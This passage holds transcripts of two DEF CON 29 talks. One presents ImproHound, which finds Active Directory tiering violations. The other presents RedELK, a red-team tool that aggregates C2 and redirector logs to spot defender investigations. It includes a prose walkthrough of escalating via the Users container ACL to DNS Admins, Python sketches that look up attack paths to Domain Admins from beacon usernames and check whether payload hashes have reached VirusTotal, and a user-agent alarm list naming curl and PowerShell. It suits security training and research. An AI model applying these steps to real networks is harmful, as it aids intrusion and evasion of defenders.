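Conceptually, once every node in that graph carries a tier marking, a control restriction violation is just an edge pointing from a less privileged tier towards a more privileged one. The sketch below illustrates the idea with an invented numeric tier property and a handful of edge types; ImproHound's real implementation uses its own labels and handles far more cases, so treat this purely as an illustration.

```python
# Sketch: find control edges that break the tier model, i.e. relationships going
# from a lower-privileged object to a higher-privileged one. The numeric "tier"
# property is invented for the example; ImproHound uses its own labels internally.
from neo4j import GraphDatabase

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "bloodhound"))

QUERY = """
MATCH (src)-[r]->(dst)
WHERE src.tier > dst.tier   // tier 0 is the most privileged, so a higher tier number controlling a lower one is a violation
  AND type(r) IN ['GenericAll', 'GenericWrite', 'WriteDacl', 'WriteOwner', 'Owns']
RETURN src.name AS source, type(r) AS edge, dst.name AS target
"""

with driver.session() as session:
    for record in session.run(QUERY):
        print(f"{record['source']} --{record['edge']}--> {record['target']}")
driver.close()
```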
So I was in need of a tool to actually identify the attack paths that break these tiering lines, because very often when people try to implement tiering it doesn't go so well — think of service accounts, for example. It's easy enough to tell an admin to use three different accounts for three different sets of servers, but it's another story with service accounts, and there are many more places where tiering is hard to implement, especially in a big, messy AD environment. And as I already said, it's difficult to look through all the ACLs manually. So I was in need of a tool, and that's why I created ImproHound. What ImproHound does is connect to the BloodHound database, which is a Neo4j graph database. So in order to use ImproHound you run BloodHound as you normally would, collect the data with the collection methods All and GPOLocalGroup so you get everything imported, the data is then automatically stored in the Neo4j database, and you connect to that database with ImproHound. I will now show you how it works. I have this small test environment with three tiers: I made an OU for each tier and put in some accounts and servers — very few — and I left the built-in groups and users where they are initially. Then I ran BloodHound, and you can see I have only a few users, groups and OUs and a few GPOs. To use ImproHound you download it from GitHub; it's an open source tool, so you can also check out the source code. I have written a blog post, made a demo video, and published install instructions, a user guide and some guidelines, so you can check all that out if you like, or just download the tool — I have already done that, so I have it here. You will be prompted to log in with the same credentials you use for the BloodHound database, and then you are shown the OU structure of the domain you collected data from; if you have more domains they will be placed under here as well. We see the same structure as before, minus the built-in containers that are not so relevant for attacking AD, because BloodHound does not collect things like foreign security principals. What you do here is set a tier level for each object. By default it assigns some tiers based on assumptions — for example that Administrators is of course tier 0 and that the Users group belongs to tier 0. If you want to change some of these groups — say Domain Admins — you can try putting it into tier 3, and if you want all its members in tier 3 as well you use this button; you can see the built-in Administrator changes to tier 3 too. Let's set that back again. You can also set all the children of an OU or container to a specific tier: the tier 0 OU we of course want in tier 0, so we use this button and all the children of this OU are now tier 0, and we do the same for the other OUs. When you think you are done setting the tier levels of all the objects, you use the "set tier for GPOs" button, which ensures that all the GPOs end up in the right tier. The logic is that if a GPO is linked to a tier 0 OU, it becomes a tier 0 GPO, because you can use that GPO to add yourself as administrator on all the servers in
that tier 0 OU. If a GPO is linked only to a tier 1 OU, it will be a tier 1 GPO. Let's see what happens when we click the button: you see this GPO changed to tier 1, and I think this one changed as well. When you are completely done, you click this button to get the tiering violations, which you receive as two CSV files, and you can also use this button to delete the tiering from the database — ImproHound creates labels and adds them to the BloodHound database; you will not see them in BloodHound, but they are in the database, and you can delete them with this button. Here we have the CSV files; let's copy them to a machine where I have Excel. The first one is called AD objects, and it is simply a long list of all the objects in the domain and the tier level you put them in. That file lets you double-check that you assigned everything correctly, and later you can use it as a reference when you realize a group you thought was tier 2 actually belongs in tier 0. The other file is the tiering violations. There are only very few tiering violations in my small domain: this user, T1 admin, which belongs to tier 1, has the WriteOwner, WriteDacl and Owns permissions on a GPO in tier 0 named something like "00 enable PowerShell script logging". This is something I've seen in a real environment: a server admin belonging to tier 1 creates a GPO and links it to the tier 1 servers, and later a tier 0 admin sees this GPO, thinks "oh, this is a great GPO", and links it to the tier 0 servers as well. That's a problem, because the tier 1 admin still has permissions on this GPO, so the tier 1 admin can now take over all the tier 0 servers this GPO is applied to. That is the kind of thing you could report to a client if you use ImproHound in an environment. Now I would like to talk a little bit about what ImproHound cannot do. There are some limitations in BloodHound — and this is really not to point fingers at SpecterOps or anything, because I really think it's great that these guys made BloodHound; it's amazing, and I'm very thankful they made it public and free — but there are limitations. BloodHound does not collect the user rights assignments of domain-joined Windows machines, so we cannot check whether users are actually allowed to log on to systems in line with the tiering. That check would be, for example, whether domain admins are still capable of logging into workstations, which is the default and which should be prevented — because if the domain admins have this permission, it will be used at some point. I also have to say it is genuinely difficult to collect these user rights assignments, because they live on the machine only, so you cannot collect them without logging in as an administrator on each system, and that is of course not functionality BloodHound has right now. You could collect them from GPOs linked to servers or workstations, but it would be difficult to piece the user rights assignments together, and there would be no guarantee that those users can actually log on, because that also depends on what's open in the firewall, which services are running, and many other
things. Another limitation: BloodHound does not collect all AD permissions, and I found one that should be collected but isn't. I can actually show you, because I've set it up in my lab. Look at the security of this object: the T2 user has full control on this object only — and the object is the Users container. That means it has full control on the container itself only; the container holds all these built-in groups, but the T2 user has permission only on the container, not on its contents. I can show you that this can be exploited, because I've also allowed this T2 user to log on to my domain controller — which is of course a finding as well. I type in the password correctly, success, and open my shell. Let's start off with whoami /all: we are the T2 user, a member of Built-in Users and Authenticated Users, but not of any privileged group. Let's try to add ourselves to DNS Admins and Domain Admins and see what happens — we get errors, because we do not have the permissions for that. But if we add a new ACE to the ACL of the Users container, we actually can: the new ACE gives us GenericAll that applies to descendant objects, meaning the permission is inherited by the children of the Users container. Running the commands again, we now only get an error for Domain Admins, not for DNS Admins — boom, we are a member of DNS Admins. It doesn't work for Domain Admins because Domain Admins is a protected group in AD, so it gets its security descriptor from AdminSDHolder, but DNS Admins is not a protected group, so we can actually add ourselves to it. And as you probably already know, DNS Admins can escalate to domain admin if DNS is hosted on the domain controller, which is usually the case. Let's just verify that this is not something you can find in BloodHound: we search for the T2 user, look towards DNS Admins — no result from the query. It shows nothing but the fact that the T2 user is a member of Domain Users. So that is something you currently have to check yourself. I have created an issue on GitHub to let the SpecterOps guys know about it, and they will probably fix it at some point, but for now you need to check some configuration mistakes manually when you are using ImproHound to find the attack paths that break the tier model. That was actually all I had to say. I hope you enjoyed the presentation — it was a great honor for me to speak at this awesome village — and I hope you all have a great DEF CON. Bye!
It is not viable for system administrators and defenders in a large Active Directory (AD) environment to ensure all AD objects have only the exact permissions they need. Microsoft realised that too, which is why they recommended organizations implement the AD tier model: split the AD into three tiers and focus on preventing attack paths leading from one tier to a more business-critical tier. The concept is great, as it in theory prevents adversaries from gaining access to the server tiers (Tier 1 and 0) when they have obtained a shell on a workstation (Tier 2), e.g. through phishing, and it prevents adversaries from gaining access to the Domain Admins, Domain Controllers, etc. in Tier 0 when they have got a shell on a web server, e.g. through an RCE vulnerability. But it turns out to be rather difficult to implement the tiering concept in AD, which is why most organizations fail at it and end up leaving security gaps. It does not help the organizations' motivation to make sure their tiering is sound that Microsoft now calls the AD tier model "legacy" and has replaced it with the more cloud-focused enterprise access model: https://docs.microsoft.com/en-us/security/compass/privileged-access-access-model#evolution-from-the-legacy-ad-tier-model As a person hired to help identify the vulnerabilities in an organization, you want to find and report the attack paths in their AD. BloodHound is a well-known and great tool for revealing some of the hidden and often unintended relationships within an AD environment and can be used to identify highly complex chained attack paths that would otherwise be almost impossible to identify. It is great for finding the shortest attack path from a compromised user or computer to a desired target, but it is not built to find and report attack paths between tiers. I will in my presentation explain and demonstrate a tool I have created called ImproHound, which takes advantage of BloodHound's graph database to identify and report the misconfigurations and security flaws that break the tiering of an AD environment. ImproHound is a FOSS tool and available on GitHub: https://github.com/improsec/ImproHound
10.5446/54345 (DOI)
Hi everybody, welcome to my DEF CON 29 Adversary Village talk. It's called Exploiting Blue Team OPSEC Failures with RedELK. My name is Marc Smeets and I hope you like the presentation. I will be available in the Discord room, or you can ask me questions any time after the talk — hit me up via Twitter or some other way you can find me. So let's dive into the talk: exploiting blue team OPSEC failures with RedELK. There's a lot to cover. A little bit about me for those who don't know me: I've been into infosec as a hobby since 1998 and professionally since 2006, with a big background in systems and network engineering, and from 2006 on I started doing pentesting. In 2016 I co-founded a company called Outflank, which you might or might not know. My core roles there are red team operations, building some of our tools, and giving some of the trainings we have created within Outflank — mainly on the offensive side, mainly red. I also have a little bit of blue team experience at some of our clients, where I did some threat hunting, which is actually pretty fun to do. So that's me. The company, Outflank: we are a boutique firm specializing in red teaming as well as trainings, mainly aimed at blue, although nowadays we also have a red-oriented training — and we have tooling. Since 2016 we have created lots of tools and given lots of presentations, and the majority of our tools are available on our GitHub. Over time, though, we have become aware that some tools are simply too powerful to be shared publicly online, and that's why a few months ago we created our Outflank Security Tooling service, which is basically our private toolset of all the tools we use during engagements that are too powerful to be shared publicly. Heads up: those tools also integrate into RedELK, and RedELK is the topic of today. So, exploiting blue team OPSEC failures with RedELK. RedELK is the tooling, and I want to walk through the whole concept of it — what it is, why we created it, how you can use it — and then of course there is the whole blue team side, because the blue team makes OPSEC mistakes just like the red team does. Those are the two main topics for today. But before we dive into that, we need to discuss how we — and by we I mean Outflank as well as myself — see red teaming. If there's one thing I would like you to take away from this talk, it is that we believe red exists solely to improve blue. Yes, we act like real attackers, but it's not a wrecking-ball approach. It's not that we come by, smash everything apart, knock down the blue team, walk away, loot the gold and start laughing. No, far from it. We see it as a sparring match, as training for blue, which means it has a fundamentally different goal: we try to train the weaknesses of the blue team and improve them for when the real attackers show up. Yes, our simulations, our red team engagements, contain real punches and real movements — it may actually hurt both sides — but it's always better to take a practice hit to the face than a real hit to the face. So we exist to train blue. No wrecking ball. Talking about our boxing ring, if you like: here is a quick overview of what a modern offensive infrastructure looks like.
Most likely yours looks conceptually about the same, although there are many different technical bits and pieces. Going from right to left, we first have our own attacking infrastructure: our command and control servers, most likely multiple; our delivery services; web services where we do tracking; all kinds of decoy things; maybe social media profiles — all the true infrastructure that is under your own span of control. On the complete left side there is the victim network, or target network, where you eventually have your implant running, talking back via HTTP or DNS or some other spooky protocol, and internally within that victim network you've got your things running, your implants connected, and so on. In the middle is what we roughly call redirectors, or deflection layers. In these modern times of cloud-enabled infrastructure it's very easy to have lots of flexible, disposable, resilient systems there — simply a layer in between that obfuscates some of your true attacking infrastructure and makes some smart routing decisions along the way. Nothing new here, I hope, but there is a reason I'm telling you this: this concept can become quite big once you count the number of components in your offensive infrastructure during operations. Take a single engagement, which might have several scenarios — for example, if you use a TIBER-based approach you will have multiple scenarios within the same operation, which also means multiple C2 servers; a typical engagement for us has around five different C2 servers. We also have multiple redirectors and reverse proxies, and domain fronting and CDN-type layers — multiple of those as well. You'll be creating multiple fake identities for the whole social engineering part. You might create a website or two. Tracking pixels everywhere — we track everything, in emails, in delivery, in multiple aspects; you need to set them up and you need to catch the hits. More things to manage. Then there's the delivery side: multiple web servers, multiple mailboxes, maybe some file sharing services, messaging platforms, whatever the new hot stuff is — again multiple aspects to manage. That's all front-facing. On your backend side you have the generic backend components: the communication channels you have internally with your team and also with the white team, your own test labs, and all kinds of log aggregation — and log aggregation is where RedELK actually comes in. The reason I'm telling you this is that this is our boxing ring, this is what we have to work with, and it's becoming quite big per operation. And if you run multiple operations at the same time, which many red team firms actually do, keeping track of that infrastructure becomes genuinely challenging. Not unsolvable, but challenging. So when we look at our offensive infrastructure we have two main typical challenges: one being oversight, the other being insight. By oversight I mean simply keeping track of where your infrastructure is and what its state is — is it up, is it running, is it okay, are you in some way hurting your own infrastructure? Multiple components, multiple different things.
Multiple engagements all together — a lot of components to keep track of. Insight is more about whether, beyond knowing that things are up and running, there is data in there that can help us run a better operation: do we have proper insight into our infrastructure? Looking at other fields, we see quite a resemblance in how such challenges are solved. I just used the term herding: to some extent we need to herd our own infrastructure, and cowboys do the same with their cattle — they use dogs to keep everything under control, which gives them a way to manage the herd. For the insight part I'd like to refer back to Mr. Edmond Locard, who was actually the true Sherlock Holmes — the French Sherlock Holmes — and the one who brought science into the field of forensics. He was among the first to start measuring things and to take an academic, scientific approach to forensic science, in the early 20th century. Why do I bring this guy into the talk? Because he is most famous for Locard's exchange principle: every contact leaves a trace. This is very much true for our own operations. As you know, every offensive action we take leaves a trace on the system. It's up to blue to see, digest and inspect that trace, but it's impossible to touch a system or perform an action remotely without leaving one. Now here's the fun thing: it also goes the other way around. It's impossible for blue to do things without leaving a trace. So if you know where to look, both the blue side and the red side can see the actions of the other. When it comes to traces left by adversaries or red teams, it's quite common to have something like a SIEM, a security operations center or cyber defense center — in any case, a team of people investigating traces and seeing things. The other way around: during operations we were in need of such a thing ourselves. Looking at the tools we had in place, there are ways of herding your infrastructure, but we also needed a way to actually investigate our infrastructure. We started looking in the open source world, we didn't find anything, and that is how RedELK came about. RedELK is a tool that is ready to be used, open sourced and available on our GitHub, and you can use it for keeping oversight of your infrastructure as well as gaining insight into what is happening in the operation — and it's important to understand both aspects. During an operation, this is how we and others most often use it: you've got the live hacking console of your C2 server — your Cobalt Strike console, for example — where you do your live hacky-hacky commands, and then there is a second window open with the RedELK web interface, which helps you with the oversight and insight of the operation: you see traffic data coming in, operational data coming in, and so on. Like I said, it's available on our GitHub, and I've written a few blog posts explaining why we need it, getting you up and running, and achieving operational oversight, with some more blog posts probably coming out in the next few months.
RedELK — the name of course comes from Red, as in offensively oriented, and ELK, as in Elasticsearch, Logstash and Kibana, the technical stack we chose to build it on. Diving into RedELK, look at your infrastructure again from a slightly different angle. On the far left you have the target network with your implant running, so attack and C2 traffic goes first to your redirectors, your first-line infra, and from there it is filtered and passed on to the C2 servers in your backend. Nothing new here. How does RedELK fit into this? Here you go: RedELK is its own piece of infrastructure — we run it on-prem, though you could run it in the cloud — and there are connectors installed on both your redirectors and your C2 servers. As data shippers we rely heavily on Filebeat; from there the data goes into Logstash filtering and is stored in an Elasticsearch database, and Kibana is the web interface for searching through it. That goes for the redirectors as well as the C2 server components, or a website you host yourself — you can pull that data into RedELK's indices too. There is also data copying happening on the backend: rsync-based scripts copy downloaded files, screenshots and all kinds of other operational data back to your central RedELK server, because in the end you will have five, six or more C2 servers for a single operation and you do not want to log into each specific C2 server to search for that one screenshot — you want it all centrally in your RedELK instance. RedELK does a few things: it indexes data, it enriches the data coming in, it ships with lots of dashboards (and you can create your own), and it is search-based, which is the core functionality of any Elastic stack. It's built on open source tools, so you are free to modify it yourself, change dashboards, whatever you like. In recent versions we have also added a Neo4j Docker instance as well as a Jupyter notebook Docker instance. The Neo4j instance is used to import output from BloodHound, so besides the Elastic stack you also have a Docker instance with Neo4j and a Jupyter notebook for quickly searching through data. This is really awesome, because now you have the operational data from your C2 infrastructure and your traffic data, but you also have knowledge about the Active Directory environment of your target, and by using the power of Jupyter notebooks you can make very quick queries that pull and match data from both your C2 output and your Neo4j instance. For example, you could take the usernames of new incoming beacons and immediately check in your Neo4j instance whether there is a path from those users to domain admin, or to any kind of admin you care about. The Jupyter notebooks are the way to make those queries quickly and generate output fast. It's really awesome, and once you get used to it, it's really powerful during an operation.
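To make that concrete, here is the kind of cell you might write in such a notebook. It is a hedged sketch rather than one of RedELK's shipped notebooks: the hosts, credentials and field names are placeholders (the rtops index pattern follows RedELK's naming, but check your own instance), and the username normalization between beacon metadata and BloodHound names is glossed over.

```python
# Notebook-style sketch: take usernames from recent beacons in Elasticsearch and
# ask the BloodHound data in Neo4j whether a path to Domain Admins exists.
from elasticsearch import Elasticsearch
from neo4j import GraphDatabase

es = Elasticsearch("https://redelk.local:9200",
                   basic_auth=("redelk", "<password>"), verify_certs=False)
neo = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "bloodhound"))

# 1. Usernames of beacons that checked in during the last day.
hits = es.search(index="rtops-*", size=100,
                 query={"range": {"@timestamp": {"gte": "now-1d"}}})["hits"]["hits"]
users = {h["_source"]["target_user"].upper()
         for h in hits if "target_user" in h["_source"]}   # field name is a placeholder

# 2. For each user, check whether a path to Domain Admins exists in the graph.
CYPHER = """
MATCH p = shortestPath((u:User)-[*1..]->(g:Group))
WHERE u.name STARTS WITH $user AND g.name STARTS WITH 'DOMAIN ADMINS@'
RETURN length(p) AS hops
"""
with neo.session() as session:
    for user in sorted(users):
        record = session.run(CYPHER, user=user).single()
        if record:
            print(f"{user}: path to Domain Admins in {record['hops']} hops")
```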
That's the core of RedELK. We mainly use the interface with the red team, and you might as well give the white team access to some dashboards; right now we mostly use the Jupyter notebooks to make data extracts that we hand to the white team, but do your own thing — you can easily give your white team access to RedELK. Now, looking at the oversight part, there is still a target SOC, a SOC within the target network, and as analysts do, they start analyzing when they have a hunch something bad is going on. They do several things: they investigate your infrastructure, so they might be querying your specific redirectors, and they put data into what I call online security search providers — think Spamhaus, VirusTotal, IBM X-Force, various domain classifiers, spam sandboxes, all kinds of different services for analyzing pieces of malware as well as infrastructure. Now here's the fun thing: those security search providers are automated, and they start querying your infrastructure as well. So if you look at the log data of your redirectors, you might see a SOC analyst investigating as well as online security search providers querying your infrastructure — for example hitting the specific URI path of your implant with different user agents. And now we're getting into the whole SIEM part: you have a big pile of logs about your operation's C2 servers and your redirector traffic, you apply a rule-based approach to look for things that might be suspicious in your own data, and you query online resources like VirusTotal to see whether an IOC of your own implant or your own uploaded file is already known there — and all of a sudden you have SIEM-type functionality. That is where RedELK fits into the bigger picture. If you look at the raw logs of your redirectors and your C2 servers, you'll see there is not that much data in them, so we need to do some enrichment, and that is where RedELK's data enrichment comes in. We do multiple things. For traffic data we map it to GeoIP data, we check whether it's a Tor-based address, we take ownership information from the IANA databases, we look at reverse DNS — all of that is put into the same record and stored in the stack. We also query GreyNoise, and for those who do not know it: GreyNoise is an excellent tool for seeing whether the traffic that hits you is just background noise of the internet. Background noise of the internet means the common scanners — it could be Google indexing, common botnets, or regular scanners sweeping the internet. GreyNoise was created for blue teams, but it is also very interesting for red-oriented minds, because if an address queries our infrastructure on a very specific path that matches our implant path, and that address is not known to GreyNoise, then most likely you want to be aware of it — most likely an analyst is actually looking into your operation. If it is known to GreyNoise, it's most likely just part of the background noise of the internet.
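As an illustration of that enrichment step, the lookup itself is a single HTTP call. The sketch below uses the GreyNoise Community API as I understand it — verify the endpoint and response fields against the current GreyNoise documentation, and the API key is of course a placeholder.

```python
# Sketch: classify an IP that hit our implant URI using the GreyNoise Community API.
import requests


def greynoise_lookup(ip):
    resp = requests.get(f"https://api.greynoise.io/v3/community/{ip}",
                        headers={"key": "<greynoise-api-key>", "Accept": "application/json"},
                        timeout=10)
    if resp.status_code == 404:        # GreyNoise has never observed this IP
        return {"noise": False, "riot": False, "classification": "unknown"}
    resp.raise_for_status()
    return resp.json()


if __name__ == "__main__":
    info = greynoise_lookup("203.0.113.7")   # TEST-NET address as a placeholder
    if not info.get("noise") and not info.get("riot"):
        print("Not internet background noise - possibly an analyst, worth an alarm")
    else:
        print(f"Known scanner or benign service: {info.get('classification')}")
```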
Other online resources we can check are Hybrid Analysis, VirusTotal, the abuse databases and IBM X-Force — multiple online resources that we can query and whose data we use for enrichment of what is in our stack. For C2 data there is a component within RedELK that picks up the logs from the C2 frameworks; it needs to be aware of how those logs are structured, and it enriches them. We have full support for Cobalt Strike, up to the latest version, as well as our own custom Outflank Stage1 C2, which is also part of our tooling offering — full support there too — and we are working on the other public frameworks. PoshC2 is, let's say, halfway: the basic logs are ingested, but the data copying of screenshots and the like is not fully done yet. It's about the same stage for Mythic: Mythic has a SIEM-logging option you need to enable when you install the team server, and once you install the RedELK component it picks up the logs and ingests them properly, but there is no data copying of screenshots just yet — we're working on that. On the longer roadmap we are also looking at Covenant and other frameworks, and you are free to connect your own C2 tooling — in the end it's just normal Logstash rules, it's all open source, so go nuts. OK, that was a lot of talking about what we do; let's see how it works in practice. Let's start with the interface that you as a red team operator will see, and from there we'll go into investigating blue team activity. Kibana is the web interface; you just log in with a username and password, and from there it's a normal Kibana interface. We have several pre-made views for the most common use, meaning the right columns, the right names and the right filters are already set up. If I click here on redirector traffic, I get a tabular view of, in this case, the last seven days of traffic that came in, from every place the data has been collected. You see a timestamp, an attack scenario, the redirector and backend names, source DNS data, and the exact URI that was requested. The attack scenario is an important one, because during an operation you will most likely have a short-haul and a long-haul, or scenario one, scenario two, scenario x if you're following TIBER, and all the other column names make sense once you look at the specific index we're talking about. So, redirector traffic — let's actually use it. Let's filter — this is just normal Kibana stuff — on only the short-haul attack scenario. You can expand a document, and you will see the GeoIP enrichment, the full log message as it was provided in the log, and several extracted fields: the actual source IP address, the frontend name you used on the reverse proxy, the program involved — in this case Apache. You will also see that it knows how to digest the different headers; in this case that makes sense because the traffic came in via a CDN, and a CDN puts in the proper X-Forwarded-For headers and so on.
That has been picked up by RedELK, and it swaps things around so the proper source IP ends up in the record. There is a lot of data chopping happening, and it presents you with an easy, readable interface. For C2 logs — so not traffic logs, but your own C2 logs — we take the same approach. It's still the same division between the attack scenarios, and you immediately see the target username, the target IP, the internal IP address, the hostname, things like that. Below that is the normal log message from Cobalt Strike, and for every action done within Cobalt Strike, the data from the top line — username, IP address and so on — is mapped onto it. You can click the link to get the full beacon log, which can often be pretty big, and within your browser you can simply Ctrl-F for quicker viewing; sometimes having the beacon log as plain text is actually easier to use than the Kibana interface. So from the Kibana interface, one click gives you the actual beacon log, and the same goes for the other C2 frameworks. Then there are screenshots: during an operation you will have made many screenshots, and looking back you will remember "there was this one system where I had this screenshot that kind of looked like it had this specific application". RedELK has an interface with quick previews as well as click-through to the full-resolution screenshots, directly available in the web interface. Because it pulls from all the different team servers, there is no need to log into each one — and the same goes for keystrokes and downloaded files. Another one is a central overview of all your IOCs. As you know, Cobalt Strike or your C2 framework generates IOC indicators, and those are ingested; you end up with this view, you can search through it, and with the power of Kibana you can also quickly export the data and present it to your white team. You go to Share, click CSV report, and it generates the CSV file — it takes a moment, but then RedELK has made the file for you, a CSV of exactly the tab you see right now. The same can be done with Jupyter notebooks, but from here it's just a quick click to have the data. Easy to use. That was the operational side. You might already be thinking this could be useful for your operations — I hope you do, because it really is useful during red team operations. Now let's talk about spotting blue team activity. There are multiple ways, multiple areas, in which we can spot actions of a blue team and the traces they leave. First there is the direct category: traffic that directly hits our offensive infrastructure — I've got a few examples of that. Then there is the indirect category, where we query online security service providers for any blue team activity. And there is a third category of internal checks: queries that your implant, already running inside the target network, can perform, and if it does the right queries you might spot blue team activity that way. Some of these are fully included in RedELK.
Some we are working on, and some are for the longer term — but first I want to talk about the concept, and then we can talk about the specifics implemented in RedELK. And if you think we are not developing fast enough: it's an open source project, come join us, come help. We need to discuss how the redirectors make their decisions and how RedELK feeds on that. Traffic originating from the actual implant is one category; the other traffic hitting a redirector is non-target related — scanners, regular internet traffic. Your redirector makes a decision based on whatever rules you put in there — this is just HAProxy, Apache, Nginx or however you configure your reverse proxy — and it either forwards the session to your true C2 backend, to a decoy website, or on to some other website. The logs produced by HAProxy, Apache, Nginx or whatever reverse proxy you use are ingested by RedELK — you saw them in the interface. For RedELK it's important to have the proper logging, so when you do the installation you actually need to change the logging of your reverse proxy tooling, and there are also specific requirements for the naming of your backends: RedELK needs to be aware of what is a decoy and what is a C2 backend, so any C2 backend should be named c2-whatever, and any decoy or deflection backend should start with decoy-whatever. Based on that decision logic, RedELK will also help you with alarms — the decisions RedELK makes matter. Once you have that up and running, you will see in the RedELK interface that an analyst connecting to your infra may eventually be routed to a decoy website or to a C2 backend, and especially traffic going to your C2 backend is interesting. More than once you will see — at least we have, and I guess you will as well — that when a blue team does a manual investigation, they use Python or curl or maybe PowerShell, and they don't always change the user agent. So you will see Python user agents coming in, and more than once we've seen that they first try it from the breakout point of their SOC internet uplink, and then also via a Tor address — multiple ways of querying you. Depending on the actual path and the backend RedELK sees being chosen, this is very interesting to watch: is an investigation going on? Another thing that becomes visible once you have the logs is that when the blue team shares the URL of something to be investigated, some instant messaging clients try to preview that website. The example here is Telegram, but the others behave basically the same: as you type, for every new character they try to fetch a preview of the URL, so they end up connecting to that host.
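To show how little is needed to turn those log lines into an alarm, here is a rough sketch of a rule over the enriched redirector traffic in Elasticsearch. It is not RedELK's actual alarm code: the index pattern follows RedELK's naming, but the field names and the time window are placeholders in the spirit of its data model.

```python
# Sketch of an alarm rule: flag recent requests that reached a "c2-" backend with a
# scripted user agent such as curl, python-requests or PowerShell.
from elasticsearch import Elasticsearch

SUSPECT_AGENTS = ["curl/", "python-requests", "python-urllib", "powershell", "go-http-client"]

es = Elasticsearch("https://redelk.local:9200",
                   basic_auth=("redelk", "<password>"), verify_certs=False)

query = {
    "bool": {
        "must": [
            {"range": {"@timestamp": {"gte": "now-15m"}}},
            {"prefix": {"redir.backendname": "c2-"}},       # only traffic sent on to a real C2 backend
        ],
        "should": [{"match_phrase": {"http.useragent": ua}} for ua in SUSPECT_AGENTS],
        "minimum_should_match": 1,
    }
}

for hit in es.search(index="redirtraffic-*", size=50, query=query)["hits"]["hits"]:
    print("ALARM - possible analyst traffic:", hit["_source"])
```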
It is interesting to see, and a clear indicator: if you see these types of instant messaging apps coming by with their user agent and querying your C2 backend infrastructure, that is interesting. So that was aimed directly at your own infra; let's talk about indirect, via online security service providers. What I am showing you here is the interface that a blue team would have, in this case for Symantec's EDR and ATP products, and I have highlighted the little checkboxes or options where it says submit to sandbox or submit to VirusTotal. You might think that is not a smart thing to do, because once it is in VirusTotal it will have a hash, and we as a red team know the hashes of our own pieces of malware. So we can query VirusTotal for that specific hash, and VirusTotal will tell us it is not there, or, if it is there, then most likely, as we have not uploaded the malware piece ourselves, the blue team has, and that is a big indicator that the attack has been discovered and your operation is compromised. Any blue team should know this, but it is made very easy for them to still click that button. That was Symantec; this is Microsoft WDATP, the Windows Defender ATP portal: there is a check against VirusTotal, and there is an option to submit it to their deep analysis, which is just a sandbox. It is made very easy for them to click those links. Talking about sandboxes: you could be deflecting traffic coming from sandboxes, based on source IP address, to a specific decoy backend on your redirector, or you could just let them come in. Either way, you can check the characteristics of that AV sandbox connection and have an alarm on it, giving you a clear indicator. We did some tests during a training: this is a mapping over, I believe, an eight-hour period, where on purpose we actually tried to trigger sandbox connections, just to have a bigger data set of what sandbox connections look like, and it most likely maps back to your own experience with sandbox connections. The funny thing is that they are not very creative with the naming. On the right side you see the actual names of the computers, and on the horizontal axis you see the different students that tried it and the amount of new AV sandbox beacons coming in. So let me zoom in: you will see names that you will probably recognize, something-PC, virtual PC, admin-something, WIN-something, all the typical Windows evaluation images. Not very creative. So this is a clear indicator, which of course you already know, that something fishy is going on, but we can also generate alarms based on this, even if it is not coming back to the C2 backend. Another one I want to highlight is domain classification. RedELK already does this: there is a config file where you enter domain names, and from there on, in this case I entered outflank.nl, it is querying X-Force, McAfee as well as BlueCoat in an automated way. You will see that for some reason at X-Force we had an error getting a reputation, but that is okay, we still have two left. What is interesting to look for here is changes in those classifications, and whether it is actually a bad reputation, a rogue type of thing. We went through all the different classification groups that those domain classifiers have, we picked out the rogue ones, and as soon as there is a mapping of your domain into one of those categories, you should be getting an alarm.
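Going back to the VirusTotal point above: a minimal sketch of that indirect check, asking VirusTotal whether anyone has uploaded a payload whose hash you already know, could look like the following. The endpoint shown is VirusTotal's public v3 file lookup; the API key and hash are placeholders, and how RedELK itself performs this check may differ.

import requests

VT_API_KEY = "YOUR-VT-API-KEY"          # placeholder
PAYLOAD_SHA256 = "aaaaaaaa...bbbbbbbb"  # hash of your own implant/loader

resp = requests.get(
    f"https://www.virustotal.com/api/v3/files/{PAYLOAD_SHA256}",
    headers={"x-apikey": VT_API_KEY}, timeout=30)

if resp.status_code == 404:
    print("Not on VirusTotal: no sign that the sample was submitted.")
elif resp.ok:
    stats = resp.json()["data"]["attributes"]["last_analysis_stats"]
    print("[ALARM] sample is on VirusTotal, someone uploaded it:", stats)
else:
    print("lookup failed:", resp.status_code)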
Another interesting area where we can spot blue team activity is the internal side: checks coming from your implant on the internal network. Let me give you a few examples. First of all, the damn nasty krbtgt. Many networks still have no automated way of changing the krbtgt password, so if you come into a network you will see that, in this case even 2010, the last password set of that specific account was 2010, and if later on in your operation it is all of a sudden reset, chances are big that it was a blue-team-initiated change. The krbtgt is very specific, but you can use the same approach for specific admin accounts or other accounts. It is hard to judge when a normal password change would happen, but if you have five admin accounts and all of a sudden they are all changed within the last day, that is a clear indicator: if all admins start changing their passwords, they are onto something. Bluejack is a tool that helps you with actually outputting this information; it is a COM-based thing that communicates and outputs in a format that RedELK is able to ingest. I am not sure whether we have open sourced it just yet. How about certificates? Here we do a scheduled check for a specific website, our own website, and this check gets the data out of the certificate. It checks whether the connection is being SSL intercepted, whether there is an SSL-intercepting corporate proxy in the way. If this changes during an operation, then the blue team has enabled SSL interception, which they often do not do from the beginning, and that is a clear indicator that something has changed that you need to be aware of, a sign of blue team investigations. Okay, as a summary. If we are talking about direct types of indicators of investigation, or maybe we should call them indicators of analysis or indicators of detection, I don't know, I don't care: if we look at the direct things, we can check for analyst traffic, so specific Tor IP addresses, curl user agents, things going straight to your C2 backend; that is a clear indicator of analysis. Deflected traffic: for some reason your redirector logic has said we need to deflect this to our decoy website or something, and we can make alarms based on that. BlueCoat and other specific security vendors have very specific ways of querying your infrastructure, and you can have insight into that data, and later on we can have alarms on that as well. Instant messaging, I showed you. A funny thing: if you know the IP ranges of blue teams, which you might learn over time, and those IP ranges are connecting to your infrastructure, even if they go to a deflected decoy backend or to your true C2 backend, you want to be aware of any type of blue team IP address accessing your infrastructure, because that is immediately suspicious. And then there are generic C2 scanners and AV sandboxes; having RedELK, you will have proper insight into what those C2 scanners are doing and where they are coming from. That is not directly alarm-related, but it is very helpful to have that insight. That is on direct traffic. If we talk about indirect, we are talking about AV hash checks, VirusTotal, Hybrid Analysis, but also infra-related lists: if you have configured RedELK so it is aware of the URLs that you use, the IP addresses of your infrastructure, and the specific TLS certs, so the hash of your cert, we can check that data against public lists of known bad IP addresses, URLs and certificates, and the domain classifiers I already showed you.
